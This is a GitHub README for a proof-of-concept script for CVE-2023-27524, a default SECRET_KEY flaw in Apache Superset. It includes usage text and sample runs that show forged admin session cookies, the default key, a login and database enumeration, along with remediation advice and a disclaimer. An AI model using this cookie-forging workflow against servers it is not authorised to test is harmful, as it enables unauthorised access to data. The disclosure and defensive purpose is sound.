- Notifications
You must be signed in to change notification settings - Fork0
Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset
License
python-programming-language/CVE-2023-27524
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Script to check if an Apache Superset server is running with an insecure default configuration (CVE-2023-27524). The script checks if a Superset server's session cookies are signed with any well-known default Flask SECRET_KEYs.
The--validate flag can be used to validate exploitability by enumerating databases using the Superset API.
More details here:https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset
% python3 CVE-2023-27524.py -h usage: CVE-2023-27524.py [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]optional arguments: -h, --help show this help message and exit --url URL, -u URL Base URL of Superset instance --id ID User ID to forge session cookie for, default=1 --validate, -v Validate login --timeout TIMEOUT, -t TIMEOUT Time to wait before using forged session cookie, default=5s% python3 CVE-2023-27524.py -u http://10.0.220.200:8088 Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ekDecoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}Superset Version: 2.0.1Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg% python3 CVE-2023-27524.py -u http://10.0.220.200:8088 --validateGot session cookie: eyJjc3JmX3Rva2VuIjoiMTY0ZWExNWJlMDhmNWM2ZmZmOGFhNTExZThhMjUzYjM1YWY5MTdlNiIsImxvY2FsZSI6ImVuIn0.ZEc07w.CAkEJ7AtDlpfvVok-w0JQVcJqa0Decoded session cookie: {'csrf_token': '164ea15be08f5c6fff8aa511e8a253b35af917e6', 'locale': 'en'}Superset Version: 2.0.1Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc07w.fOAFW0_5gLUTkIbeR_5AqEz2DoUSleeping 5 seconds before using forged cookie to account for time drift...Got 302 on login, forged cookie appears to have been acceptedEnumerating databasesFound database examplesFound database PostgreSQLDone enumerating databasesIf the script detects a SECRET_KEY in use but is not able to validate exploitability, it could be because:
- target server is integrated with SSO and user ids don't follow the auto-increment format (try the
--idargument to set a specific user_id if you know it) - no user has been configured yet
- time drift between target and your machine. Flask session cookies are signed with a timestamp element. Try increasing the 5 second sleep interval in code.
Follow theinstructions here to generate and configure a Flask SECRET_KEY. Thesuperset CLI tool can be used torotate the SECRET_KEY so that existing database connection information is preserved.
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
About
Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset
Resources
License
Uh oh!
There was an error while loading.Please reload this page.
Stars
Watchers
Forks
Releases
Packages0
Languages
- Python100.0%